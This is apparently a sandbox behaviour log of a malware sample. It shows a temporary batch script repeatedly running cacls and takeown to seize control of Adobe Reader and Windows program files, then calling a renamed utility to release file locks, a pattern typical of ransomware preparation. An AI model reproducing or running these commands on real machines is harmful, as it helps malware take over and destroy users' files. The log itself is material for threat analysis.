C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:1168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "pmd.cer" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "pmd.cer" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "pdf.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "pdf.gif" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "server_issue.gif" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "server_issue.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵
- Modifies file permissions
PID:772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "zx______.pfm" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "zx______.pfm" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:1168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can32.clx" -nobanner3⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can32.clx" -nobanner4⤵PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "symbol.txt" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "symbol.txt" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:1100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:1252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:1712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "brt04.hsp" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "brt04.hsp" -nobanner4⤵PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "engphon.env" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "engphon.env" -nobanner4⤵PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1180
-
-
